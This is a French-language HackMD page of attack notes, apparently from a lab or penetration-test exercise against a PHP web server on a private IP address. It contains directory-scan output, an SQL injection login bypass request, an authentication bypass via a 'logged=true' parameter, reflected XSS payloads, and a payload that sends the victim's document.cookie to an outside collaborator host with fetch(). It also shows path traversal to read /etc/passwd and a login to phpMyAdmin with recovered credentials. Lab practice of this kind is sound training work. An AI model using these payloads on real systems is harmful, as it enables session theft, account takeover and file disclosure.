Attaque - HackMD

# Attaque ## Recon Web ``` [13:51:30] 403 - 279B - /.ht_wsr.txt [13:51:30] 403 - 279B - /.htaccess.bak1 [13:51:30] 403 - 279B - /.htaccess.orig [13:51:30] 403 - 279B - /.htaccess.sample [13:51:30] 403 - 279B - /.htaccess_orig [13:51:30] 403 - 279B - /.htaccess.save [13:51:30] 403 - 279B - /.htaccessBAK [13:51:30] 403 - 279B - /.htaccess_extra [13:51:30] 403 - 279B - /.htaccess_sc [13:51:30] 403 - 279B - /.htaccessOLD [13:51:30] 403 - 279B - /.htaccessOLD2 [13:51:30] 403 - 279B - /.htm [13:51:30] 403 - 279B - /.html [13:51:30] 403 - 279B - /.htpasswd_test [13:51:30] 403 - 279B - /.htpasswds [13:51:30] 403 - 279B - /.httr-oauth [13:51:31] 403 - 279B - /.php [13:51:43] 200 - 254B - /index.php [13:51:43] 200 - 254B - /index.php/login/ [13:51:47] 200 - 13KB - /phpmyadmin/doc/html/index.html [13:51:47] 301 - 319B - /phpmyadmin -> http://172.17.37.92/phpmyadmin/ [13:51:48] 200 - 92KB - /phpinfo.php [13:51:48] 200 - 10KB - /phpmyadmin/ [13:51:48] 200 - 10KB - /phpmyadmin/index.php [13:51:50] 403 - 279B - /server-status [13:51:50] 403 - 279B - /server-status/ ``` ### 1. Web : SQLi Dans la page login : ``` GET /phpserver/login.php?login=admin&password='%20or%20'z'%3d'z HTTP/1.1 Host: 172.17.37.92 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://172.17.37.92/phpserver/home.php Cookie: PHPSESSID=ks6bi6th5dimjp5qp1kcuuiu15 Upgrade-Insecure-Requests: 1 ``` Payloads qui marchent ![](https://i.imgur.com/poTAGb0.png) ``` ``` ![](https://i.imgur.com/d4JXo1S.png) ![](https://i.imgur.com/Dj3fy4E.png) ## 2. Broken auth ![](https://i.imgur.com/ThIWYRz.png) Added `logged=true` : ![](https://i.imgur.com/UroOlFS.png) ## 3. web directory ![](https://i.imgur.com/8WJu9QN.png) ## 4. HTTP sniffer ![](https://i.imgur.com/pdwJmL8.png) ## XSS http://172.17.37.92/phpserver/info.php?name=%3C/pre%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3Cpre%3E&logged=true# ![](https://i.imgur.com/mnU3CkI.png) Cookie exfiltration : Used -> http://172.17.37.92/phpserver/info.php?name=%3Cimg%20src=x%20onerror=fetch(%27//q1s731spl18jcfrrmfz9cmjmpdv5ju.burpcollaborator.net?c=%27%2Bdocument.cookie)%3E&logged=true# ![](https://i.imgur.com/RZZs9BK.png) Credentials SQL trouvés. ![](https://i.imgur.com/UL2IVbE.png) Log in dans PHPMyAdmin : ![](https://i.imgur.com/IT4Vkgo.png) On peut voir que le password est stocké en clair, ce qui est fort malheureux. http://172.17.37.92/secretPath/secure.php?file=%3Cimg%20src=x%20onerror=alert(1)%3E ![](https://i.imgur.com/wmC44jH.png) http://172.17.37.92/secretPath/secure.php?file=../../../../etc/passwd ![](https://i.imgur.com/yIZBgsD.png) ![](https://i.imgur.com/tTjcwMS.png) Fuzz de tous les fichiers ![](https://i.imgur.com/QDJLKok.png) ![](https://i.imgur.com/t2TsfFT.png) ![](https://i.imgur.com/y0OxJvL.png)